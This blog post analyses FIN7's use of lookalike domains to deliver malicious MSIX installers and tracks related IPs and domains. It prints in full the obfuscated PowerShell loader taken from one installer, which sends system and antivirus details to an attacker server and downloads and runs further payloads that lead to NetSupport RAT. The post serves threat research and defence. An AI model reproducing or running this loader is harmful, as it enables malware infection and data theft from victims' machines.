Quick note: This post is an attempt to share what I’ve learned while doing some research about this specific group (FIN7). I am newer to this and hope to continue to learn along the way.
Who is FIN7?
A quick introduction to the group: FIN7 is a Russian advanced persistent threat (APT) group with financial motive.
Lookalike Domains
The criminal group has several techniques they utilize for initial access, but in this post the focus is going to be on Acquire Infrastructure: Domains as this is what has been observed more recently. When doing some looking around in a discord server I noticed a user shared two IOCs, which allowed me to pivot from:
- winscp-install[.]com
- webex-install[.]com
My initial go to was to check virustotal for webex-install[.]com and immediately there were signs of this being malicious.
Out of curiosity I decided to navigate to the site, but unfortunately I was met with an “Error 404” page. Note the creation date is 23 days ago, so this is not uncommon to see. Checking the relations to this domain is how I was able to pivot and find other domains related to FIN7 activity.
The focus was on the IP 89.105.198[.]190. As we can see the same domain webex-install[.]com. There are also two other domains which were quite interesting to me:
- webex-install[.]com
- workable[.]uk[.]com
- lexisnexis[.]day
I went to attempt to navigate to the workable[.]uk[.]com domain in hopes I did not receive another 404 error. Thankfully, I did not run into that error and instead was prompted with this:
Upon clicking install, an MSIX file will be downloaded from:
- hxxp://eprst281[.]boo/files/Workable_4.12.7.msix
Brief Analysis
A great resource to learn how MSIX files work and are being abused by different threat actors can be found here. From what has been seen so far the MSIX files are signed using the same code signing certificate, which has now been revoked:
After extracting the MSIX file the contents can be found:
The file of interest is the obfuscated powershell script:
$ichdTJY = Start-Job -ScriptBlock {
$oPAEkmmjPyzy = (Get-WmiObject -Class Win32_OperatingSystem).Caption
$wDanVOwR = '28'
$wfzmlszgmVtQUYUUwRt = '30728cf7-bb0d-4a33-bdfd-a6b7ed6a5ef5'
$fhchgWPVrqIqUPqgcOOO = [System.Net.WebUtility]::UrlEncode($oPAEkmmjPyzy)
$LUxRscsKKBRth = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Domain
$nlSPbOnSAQYuMuAI = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct
$aUWolpXvzrtSDvyklrHkCEl = $nlSPbOnSAQYuMuAI | ForEach-Object {
$_.displayName
}
$tpfsK = $aUWolpXvzrtSDvyklrHkCEl -join ", "
$AFyMFqIXvpe = "w"
$NivxTxiACKAPfyA = (New-Guid).ToString()
$snQQaaojQUQstasltzdn = New-Object Net.WebClient
$snQQaaojQUQstasltzdn.Headers.Add("User-Agent", "myUserAgentHere")
$HDcwONNbcuwjMjl = "?mUmaTqeCSyapz=$tpfsK&kGv=$LUxRscsKKBRth&N=$fhchgWPVrqIqUPqgcOOO&jie=$($wDanVOwR)&WdrFptFnYp=$wfzmlszgmVtQUYUUwRt&File=file&An=$AFyMFqIXvpe&eobpWq=$NivxTxiACKAPfyA"
$myBOCBakmwZ = "https"+":"+"//"+"eprst2"+"8"+"1.boo/736"+"8"+"9d"+"8"+"a-25b4-41cf-b693-05591ed"+"8"+"04a7-7433f7b1-9997-477b-aadc-5a6e"+"8"+"d233c61" + "$($HDcwONNbcuwjMjl)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($myBOCBakmwZ)
$DbDTDpCwZMSMMDwgppZg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($TiihNxiAfUseqsgTigMUrUrBW))
$FwbZRZhc = "usradm"
if ($DbDTDpCwZMSMMDwgppZg.Contains($FwbZRZhc)) {
try {
$OrHgenwetl = "JVVhwbDxQNpJVpDhVJMMKNDz.ps1"
$Z = "C:\ProgramData\$($OrHgenwetl)"
$DbDTDpCwZMSMMDwgppZg | Out-File -FilePath $Z
$JEVANRLBFtRIItNxJyzwyEL = $OrHgenwetl
$HDcwONNbcuwjMjl = "?DZZZSIVcVkqLoNDwDYUJbI=$($OrHgenwetl)&WdrFptFnYp=$($wfzmlszgmVtQUYUUwRt)"
$MMyfnoiwhzwE = "https"+":"+"//"+"eprst281.boo/bb9c1a14-4e3d-40ab-bcc8-0b84e782"+"5"+""+"5"+"b0-4bed9ff2-0f4e-48fb-92ed-106"+"5"+"fcd8"+"5"+"e01" + "$($HDcwONNbcuwjMjl)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($MMyfnoiwhzwE)
$DbDTDpCwZMSMMDwgppZg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($TiihNxiAfUseqsgTigMUrUrBW))
Invoke-Expression $DbDTDpCwZMSMMDwgppZg
}
catch {
$rgswggnIPKzenyMLnTc = $_.Exception.Message
$CbWbXrCrPfNkmEXLD = "?eobpWq=$($NivxTxiACKAPfyA)&oUkejZWCT=$($rgswggnIPKzenyMLnTc)"
$NHwseaODsTum = "https"+":"+"//"+"eprst281.boo/223dc805"+"-"+"5605"+"-"+"4a0b"+"-"+"b828"+"-"+"cdad1b84126e"+"-"+"79d39c2c"+"-"+"0f10"+"-"+"48d1"+"-"+"9edf"+"-"+"c18a784efba0" + "$($CbWbXrCrPfNkmEXLD)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($NHwseaODsTum)
try {
$kPbNiOPkcsgdOAVdN = "?aklshdjahsjdh=$($wDanVOwR)&ajhsdjhasjhd=nsp&ahsdjkasjkdh=$($($NivxTxiACKAPfyA))"
$xVTdrYOAEg = "https"+":"+"//"+"eprst28"+"1"+".boo/974afa0a-d334-48ec-a0d4-4cc"+"1"+"4efa730c-"+"1"+"d3d044a-e654-4"+"1"+"e3-ad32-38a2934393e4" + "$($kPbNiOPkcsgdOAVdN)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($xVTdrYOAEg)
$DbDTDpCwZMSMMDwgppZg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($TiihNxiAfUseqsgTigMUrUrBW))
Invoke-Expression $DbDTDpCwZMSMMDwgppZg
}
catch {
$rgswggnIPKzenyMLnTc = $_.Exception.Message
$CbWbXrCrPfNkmEXLD = "?eobpWq=$($NivxTxiACKAPfyA)&oUkejZWCT=$($rgswggnIPKzenyMLnTc)"
$NHwseaODsTum = "https"+":"+"//"+"eprst281.boo/223dc805"+"-"+"5605"+"-"+"4a0b"+"-"+"b828"+"-"+"cdad1b84126e"+"-"+"79d39c2c"+"-"+"0f10"+"-"+"48d1"+"-"+"9edf"+"-"+"c18a784efba0" + "$($CbWbXrCrPfNkmEXLD)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($NHwseaODsTum)
}
}
} else {
try {
Invoke-Expression $DbDTDpCwZMSMMDwgppZg
}
catch {
$rgswggnIPKzenyMLnTc = $_.Exception.Message
$CbWbXrCrPfNkmEXLD = "?eobpWq=$($NivxTxiACKAPfyA)&oUkejZWCT=$($rgswggnIPKzenyMLnTc)"
$NHwseaODsTum = "https"+":"+"//"+"eprst281.boo/223dc805"+"-"+"5605"+"-"+"4a0b"+"-"+"b828"+"-"+"cdad1b84126e"+"-"+"79d39c2c"+"-"+"0f10"+"-"+"48d1"+"-"+"9edf"+"-"+"c18a784efba0" + "$($CbWbXrCrPfNkmEXLD)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($NHwseaODsTum)
try {
$kPbNiOPkcsgdOAVdN = "?aklshdjahsjdh=$($wDanVOwR)&ajhsdjhasjhd=nsp&ahsdjkasjkdh=$($($NivxTxiACKAPfyA))"
$xVTdrYOAEg = "https"+":"+"//"+"eprst28"+"1"+".boo/974afa0a-d334-48ec-a0d4-4cc"+"1"+"4efa730c-"+"1"+"d3d044a-e654-4"+"1"+"e3-ad32-38a2934393e4" + "$($kPbNiOPkcsgdOAVdN)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($xVTdrYOAEg)
$DbDTDpCwZMSMMDwgppZg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($TiihNxiAfUseqsgTigMUrUrBW))
Invoke-Expression $DbDTDpCwZMSMMDwgppZg
}
catch {
$rgswggnIPKzenyMLnTc = $_.Exception.Message
$CbWbXrCrPfNkmEXLD = "?eobpWq=$($NivxTxiACKAPfyA)&oUkejZWCT=$($rgswggnIPKzenyMLnTc)"
$NHwseaODsTum = "https"+":"+"//"+"eprst281.boo/223dc805"+"-"+"5605"+"-"+"4a0b"+"-"+"b828"+"-"+"cdad1b84126e"+"-"+"79d39c2c"+"-"+"0f10"+"-"+"48d1"+"-"+"9edf"+"-"+"c18a784efba0" + "$($CbWbXrCrPfNkmEXLD)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($NHwseaODsTum)
}
}
}
}
$FvbEMnv= "https"+":"+"//"+"wo"+"r"+"kable.com/"
Start-Process $FvbEMnv
Receive-Job -Job $ichdTJY -WaitAnyRun was used to see the infection chain for this specific file, although I had to manually run the powershell file: https://app.any.run/tasks/82331874-8edc-421d-8df1-b16f08d5cbd1
What this does is ends up downloading NetSupport RAT as shown in the AnyRun task (client32.exe)
Other Domains
With the help of the community NDA0E, RussianPanda9xx, g0njxa, 500mk500, ValidinLLC (in no particular order) that interacted with the post I had on twitter https://x.com/rewscel/status/1785407518522401223, there were other domains discovered associated with another IP address (94.131.101[.]65):
- asana[.]tel
- asana[.]pm
- asana[.]wf
Tracking
We can track newer domains created by using tools like https://app.validin.com/detail to query for the IP addresses found and checking the DNS history.
There are also many other ways we can track this since a lot of the sites share similarities. Keeping track of these using Maltego can be useful for example:
Samples: https://bazaar.abuse.ch/browse.php?search=serial_number:432291ee2d1f6b4f2d5e1e00
Conclusion
FIN7 is abusing look-alike domains to either use them in SEO poisoning attacks or spear phishing campaigns and drop NetSupport RAT. There are many different way to profile and pivot off of the information shared amongst the community.
